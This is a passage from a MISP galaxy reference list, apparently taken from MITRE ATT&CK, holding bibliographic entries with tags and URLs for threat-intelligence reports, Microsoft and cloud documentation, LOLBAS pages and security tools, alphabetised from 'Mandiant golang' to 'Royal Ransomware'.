https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html

Mandiant golang stripped binaries explanation

Stephen Eckels. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="Mandiant golang stripped binaries explanation"

Table 15124. Table References

Links

https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery

reagentc_cmd

Microsoft, EliotSeattle, et al. (2022, August 18). REAgentC command-line options. Retrieved October 19, 2022.

The tag is: misp-galaxy:references="reagentc_cmd"

Table 15125. Table References

Links

https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11

Microsoft DART Case Report 001

Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Microsoft DART Case Report 001"

Table 15126. Table References

Links

https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team

Sans ARP Spoofing Aug 2003

Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Sans ARP Spoofing Aug 2003"

Table 15127. Table References

Links

https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411

Github CLI Create Webhook

Github. (n.d.). Receiving webhooks with the GitHub CLI. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Github CLI Create Webhook"

Table 15128. Table References

Links

https://docs.github.com/en/webhooks-and-events/webhooks/receiving-webhooks-with-the-github-cli

Kaspersky Cloud Atlas August 2019

GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Kaspersky Cloud Atlas August 2019"

Table 15129. Table References

Links

https://securelist.com/recent-cloud-atlas-activity/92016/

Talos MuddyWater May 2019

Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="Talos MuddyWater May 2019"

Table 15130. Table References

Links

https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html

Free Desktop Entry Keys

Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Free Desktop Entry Keys"

Table 15131. Table References

Links

https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html

Recorded Future APT3 May 2017

Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="Recorded Future APT3 May 2017"

Table 15132. Table References

Links

https://www.recordedfuture.com/chinese-mss-behind-apt3/

Trend Micro Daserf Nov 2017

Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Trend Micro Daserf Nov 2017"

Table 15133. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

RHEL auditd

Jahoda, M. et al. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="RHEL auditd"

Table 15134. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

Red Hat System Auditing

Jahoda, M. et al. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Red Hat System Auditing"

Table 15135. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

Cylance Redirect to SMB

Cylance. (2015, April 13). Redirect to SMB. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Cylance Redirect to SMB"

Table 15136. Table References

Links

https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf

Black Hills Red Teaming MS AD Azure, 2018

Felch, M. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Black Hills Red Teaming MS AD Azure, 2018"

Table 15137. Table References

Links

https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

OutFlank System Calls

de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="OutFlank System Calls"

Table 15138. Table References

Links

https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

US-CERT TA17-156A SNMP Abuse 2017

US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="US-CERT TA17-156A SNMP Abuse 2017"

Table 15139. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/TA17-156A

Cloudflare ReflectionDoS May 2017

Marek Majkowski, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Cloudflare ReflectionDoS May 2017"

Table 15140. Table References

Links

https://blog.cloudflare.com/reflections-on-reflections/

Trend Micro

Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Trend Micro"

Table 15141. Table References

Links

https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html

Microsoft Reg

Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.

The tag is: misp-galaxy:references="Microsoft Reg"

Table 15142. Table References

Links

https://technet.microsoft.com/en-us/library/cc732643.aspx

LOLBAS Regasm

LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Regasm"

Table 15143. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

MSDN Regasm

Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.

The tag is: misp-galaxy:references="MSDN Regasm"

Table 15144. Table References

Links

https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx

Microsoft RegDelNull July 2016

Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Microsoft RegDelNull July 2016"

Table 15145. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull

Regedit.exe - LOLBAS Project

LOLBAS. (2018, May 25). Regedit.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Regedit.exe - LOLBAS Project"

Table 15146. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

Reg.exe - LOLBAS Project

LOLBAS. (2018, May 25). Reg.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Reg.exe - LOLBAS Project"

Table 15147. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Reg/

Microsoft Reghide NOV 2006

Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="Microsoft Reghide NOV 2006"

Table 15148. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/reghide

Regini.exe - LOLBAS Project

LOLBAS. (2020, July 3). Regini.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Regini.exe - LOLBAS Project"

Table 15149. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regini/

Register-cimprovider.exe - LOLBAS Project

LOLBAS. (2018, May 25). Register-cimprovider.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Register-cimprovider.exe - LOLBAS Project"

Table 15150. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/

Microsoft Registry

Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Microsoft Registry"

Table 15151. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry

Tilbury 2014

Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Tilbury 2014"

Table 15152. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

Microsoft COR_PROFILER Feb 2013

Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Microsoft COR_PROFILER Feb 2013"

Table 15153. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)

Microsoft Registry Auditing Aug 2016

Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Registry Auditing Aug 2016"

Table 15154. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)

MSDN Registry Key Security

Microsoft. (n.d.). Registry Key Security and Access Rights. Retrieved March 16, 2017.

The tag is: misp-galaxy:references="MSDN Registry Key Security"

Table 15155. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx

Registry Key Security

Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.

The tag is: misp-galaxy:references="Registry Key Security"

Table 15156. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN

Microsoft Registry Drivers

Microsoft. (2021, December 14). Registry Trees for Devices and Drivers. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Microsoft Registry Drivers"

Table 15157. Table References

Links

https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys

Microsoft System Wide Com Keys

Microsoft. (n.d.). Registry Values for System-Wide Security. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft System Wide Com Keys"

Table 15158. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx

LOLBAS Regsvcs

LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Regsvcs"

Table 15159. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

MSDN Regsvcs

Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.

The tag is: misp-galaxy:references="MSDN Regsvcs"

Table 15160. Table References

Links

https://msdn.microsoft.com/en-us/library/04za0hca.aspx

LOLBAS Regsvr32

LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Regsvr32"

Table 15161. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

Fortinet Remcos Feb 2017

Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Fortinet Remcos Feb 2017"

Table 15162. Table References

Links

https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html

Mandiant Remediation and Hardening Strategies for Microsoft 365

Mandiant. (2022, August). Remediation and Hardening Strategies for Microsoft 365 to Defend Against APT29. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Mandiant Remediation and Hardening Strategies for Microsoft 365"

Table 15163. Table References

Links

https://www.mandiant.com/sites/default/files/2022-08/remediation-hardening-strategies-for-m365-defend-against-apt29-white-paper.pdf

Mandiant Defend UNC2452 White Paper

Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="Mandiant Defend UNC2452 White Paper"

Table 15164. Table References

Links

https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf

Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452

Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.

The tag is: misp-galaxy:references="Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452"

Table 15165. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html

TechNet Remote Desktop Services

Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="TechNet Remote Desktop Services"

Table 15166. Table References

Links

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Remote.exe - LOLBAS Project

LOLBAS. (2021, June 1). Remote.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Remote.exe - LOLBAS Project"

Table 15167. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/

Microsoft Remote Use of Local

Margosis, A. (2018, December 10). Remote Use of Local Accounts: LAPS Changes Everything. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Remote Use of Local"

Table 15168. Table References

Links

https://blogs.technet.microsoft.com/secguide/2018/12/10/remote-use-of-local-accounts-laps-changes-everything/

SigmaHQ

Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule Task - Registry. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="SigmaHQ"

Table 15169. Table References

Links

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml

disable_win_evt_logging

Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="disable_win_evt_logging"

Table 15170. Table References

Links

https://ptylu.github.io/content/report/report.html?report=25

Microsoft Replace Process Token

Brower, N., Lich, B. (2017, April 19). Replace a process level token. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Microsoft Replace Process Token"

Table 15171. Table References

Links

https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token

Replace.exe - LOLBAS Project

LOLBAS. (2018, May 25). Replace.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Replace.exe - LOLBAS Project"

Table 15172. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Replace/

Bugcrowd Replay Attack

Bugcrowd. (n.d.). Replay Attack. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Bugcrowd Replay Attack"

Table 15173. Table References

Links

https://www.bugcrowd.com/glossary/replay-attack/

Mac Forwarding Rules

Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.

The tag is: misp-galaxy:references="Mac Forwarding Rules"

Table 15174. Table References

Links

https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac

GitHub Reptile

Augusto, I. (2018, March 8). Reptile - LKM Linux rootkit. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="GitHub Reptile"

Table 15175. Table References

Links

https://github.com/f0rb1dd3n/Reptile

AWS Temporary Security Credentials

AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AWS Temporary Security Credentials"

Table 15176. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html

ARS Technica China Hack SK April 2017

Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="ARS Technica China Hack SK April 2017"

Table 15177. Table References

Links

https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/

Wired SandCat Oct 2019

Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Wired SandCat Oct 2019"

Table 15178. Table References

Links

https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec

MSitPros CMSTP Aug 2017

Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="MSitPros CMSTP Aug 2017"

Table 15179. Table References

Links

https://msitpros.com/?p=3960

sentinellabs resource named fork 2020

Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="sentinellabs resource named fork 2020"

Table 15180. Table References

Links

https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/

GitHub Responder

Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="GitHub Responder"

Table 15181. Table References

Links

https://github.com/SpiderLabs/Responder

Mandiant UNC2589 March 2022

Sadowski, J; Hall, R. (2022, March 4). Responses to Russia’s Invasion of Ukraine Likely to Spur Retaliation. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="Mandiant UNC2589 March 2022"

Table 15182. Table References

Links

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

CrowdStrike BGH Ransomware 2021

Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="CrowdStrike BGH Ransomware 2021"

Table 15183. Table References

Links

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/

Google - Restore Cloud Snapshot

Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Google - Restore Cloud Snapshot"

Table 15184. Table References

Links

https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

Google Instances Resource

Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.

The tag is: misp-galaxy:references="Google Instances Resource"

Table 15185. Table References

Links

https://cloud.google.com/compute/docs/reference/rest/v1/instances

Secureworks IRON LIBERTY July 2019

Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.

The tag is: misp-galaxy:references="Secureworks IRON LIBERTY July 2019"

Table 15186. Table References

Links

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

Palo Alto Retefe

Levene, B., Falcone, R., Grunzweig, J., Lee, B., Olson, R. (2015, August 20). Retefe Banking Trojan Targets Sweden, Switzerland and Japan. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Palo Alto Retefe"

Table 15187. Table References

Links

https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/

AWS Secrets Manager

AWS. (n.d.). Retrieve secrets from AWS Secrets Manager. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="AWS Secrets Manager"

Table 15188. Table References

Links

https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html

Directory Services Internals DPAPI Backup Keys Oct 2015

Grafnetter, M. (2015, October 26). Retrieving DPAPI Backup Keys from Active Directory. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Directory Services Internals DPAPI Backup Keys Oct 2015"

Table 15189. Table References

Links

https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/

Malwarebytes RokRAT VBA January 2021

Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.

The tag is: misp-galaxy:references="Malwarebytes RokRAT VBA January 2021"

Table 15190. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/

jRAT Symantec Aug 2018

Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="jRAT Symantec Aug 2018"

Table 15191. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques

Morphisec Snip3 May 2021

Lorber, N. (2021, May 7). Revealing the Snip3 Crypter, a Highly Evasive RAT Loader. Retrieved September 13, 2023.

The tag is: misp-galaxy:references="Morphisec Snip3 May 2021"

Table 15192. Table References

Links

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

Microsoft DUBNIUM June 2016

Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Microsoft DUBNIUM June 2016"

Table 15193. Table References

Links

https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/

Microsoft DUBNIUM Flash June 2016

Microsoft. (2016, June 20). Reverse-engineering DUBNIUM’s Flash-targeting exploit. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Microsoft DUBNIUM Flash June 2016"

Table 15194. Table References

Links

https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/

Microsoft DUBNIUM July 2016

Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Microsoft DUBNIUM July 2016"

Table 15195. Table References

Links

https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

CSRB LAPSUS$ July 24 2023

Cyber Safety Review Board. (2023, July 24). Review of the Attacks Associated with LAPSUS$ and Related Threat Groups. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="CSRB LAPSUS$ July 24 2023"

Table 15196. Table References

Links

https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf

Intel 471 REvil March 2020

Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Intel 471 REvil March 2020"

Table 15197. Table References

Links

https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

BleepingComputer REvil 2021

Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="BleepingComputer REvil 2021"

Table 15198. Table References

Links

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

Secureworks REvil September 2019

Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Secureworks REvil September 2019"

Table 15199. Table References

Links

https://www.secureworks.com/research/revil-sodinokibi-ransomware

Secureworks GandCrab and REvil September 2019

Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Secureworks GandCrab and REvil September 2019"

Table 15200. Table References

Links

https://www.secureworks.com/blog/revil-the-gandcrab-connection

Enigma Reviving DDE Jan 2018

Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="Enigma Reviving DDE Jan 2018"

Table 15201. Table References

Links

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

GitHub Revoke-Obfuscation

Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="GitHub Revoke-Obfuscation"

Table 15202. Table References

Links

https://github.com/danielbohannon/Revoke-Obfuscation

FireEye Revoke-Obfuscation July 2017

Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="FireEye Revoke-Obfuscation July 2017"

Table 15203. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf

HC3 Analyst Note Rhysida Ransomware August 2023

Health Sector Cybersecurity Coordination Center (HC3). (2023, August 4). Rhysida Ransomware. Retrieved August 11, 2023.

The tag is: misp-galaxy:references="HC3 Analyst Note Rhysida Ransomware August 2023"

Table 15204. Table References

Links

https://www.hhs.gov/sites/default/files/rhysida-ransomware-sector-alert-tlpclear.pdf

Microsoft XorDdos Linux Stealth 2022

Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Microsoft XorDdos Linux Stealth 2022"

Table 15205. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

httrack_unhcr

RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="httrack_unhcr"

Table 15206. Table References

Links

https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/

US-CERT Alert TA13-175A Risks of Default Passwords on the Internet

US-CERT. (n.d.). Risks of Default Passwords on the Internet. Retrieved April 12, 2019.

The tag is: misp-galaxy:references="US-CERT Alert TA13-175A Risks of Default Passwords on the Internet"

Table 15207. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA13-175A

ROADtools Github

Dirk-jan Mollema. (2022, January 31). ROADtools. Retrieved January 31, 2022.

The tag is: misp-galaxy:references="ROADtools Github"

Table 15208. Table References

Links

https://github.com/dirkjanm/ROADtools

Harmj0y Roasting AS-REPs Jan 2017

HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Harmj0y Roasting AS-REPs Jan 2017"

Table 15209. Table References

Links

http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

Anomali Rocke March 2019

Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.

The tag is: misp-galaxy:references="Anomali Rocke March 2019"

Table 15210. Table References

Links

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

Talos Rocke August 2018

Liebenberg, D. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Talos Rocke August 2018"

Table 15211. Table References

Links

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

Check Point Rocket Kitten

Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.

The tag is: misp-galaxy:references="Check Point Rocket Kitten"

Table 15212. Table References

Links

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

NCCGroup RokRat Nov 2018

Pantazopoulos, N. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.

The tag is: misp-galaxy:references="NCCGroup RokRat Nov 2018"

Table 15213. Table References

Links

https://research.nccgroup.com/2018/11/08/rokrat-analysis/

Talos ROKRAT 2

Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.

The tag is: misp-galaxy:references="Talos ROKRAT 2"

Table 15214. Table References

Links

https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

Kubernetes RBAC

Kubernetes. (n.d.). Role Based Access Control Good Practices. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes RBAC"

Table 15215. Table References

Links

https://kubernetes.io/docs/concepts/security/rbac-good-practices/

Google Cloud Service Account Authentication Roles

Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="Google Cloud Service Account Authentication Roles"

Table 15216. Table References

Links

https://cloud.google.com/iam/docs/service-account-permissions

BBC-Ronin

Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="BBC-Ronin"

Table 15217. Table References

Links

https://www.bbc.com/news/technology-60933174

Wikipedia Root Certificate

Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.

The tag is: misp-galaxy:references="Wikipedia Root Certificate"

Table 15218. Table References

Links

https://en.wikipedia.org/wiki/Root_certificate

Wikipedia Rootkit

Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="Wikipedia Rootkit"

Table 15219. Table References

Links

https://en.wikipedia.org/wiki/Rootkit

Sekoia HideDRV Oct 2016

Rascagnères, P. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="Sekoia HideDRV Oct 2016"

Table 15220. Table References

Links

http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf

RotaJakiro 2021 netlab360 analysis

Alex Turing, Hui Wang. (2021, April 28). RotaJakiro: A long live secret backdoor with 0 VT detection. Retrieved June 14, 2023.

The tag is: misp-galaxy:references="RotaJakiro 2021 netlab360 analysis"

Table 15221. Table References

Links

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

netlab360 rotajakiro vs oceanlotus

Alex Turing. (2021, May 6). RotaJakiro, the Linux version of the OceanLotus. Retrieved June 14, 2023.

The tag is: misp-galaxy:references="netlab360 rotajakiro vs oceanlotus"

Table 15222. Table References

Links

https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/

TechNet Route

Microsoft. (n.d.). Route. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Route"

Table 15223. Table References

Links

https://technet.microsoft.com/en-us/library/bb490991.aspx

Kroll Royal Deep Dive February 2023

Iacono, L. and Green, S. (2023, February 13). Royal Ransomware Deep Dive. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Kroll Royal Deep Dive February 2023"

Table 15224. Table References

Links

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

Trend Micro Royal Linux ESXi February 2023

Morales, N. et al. (2023, February 20). Royal Ransomware Expands Attacks by Targeting Linux ESXi Servers. Retrieved March 30, 2023.

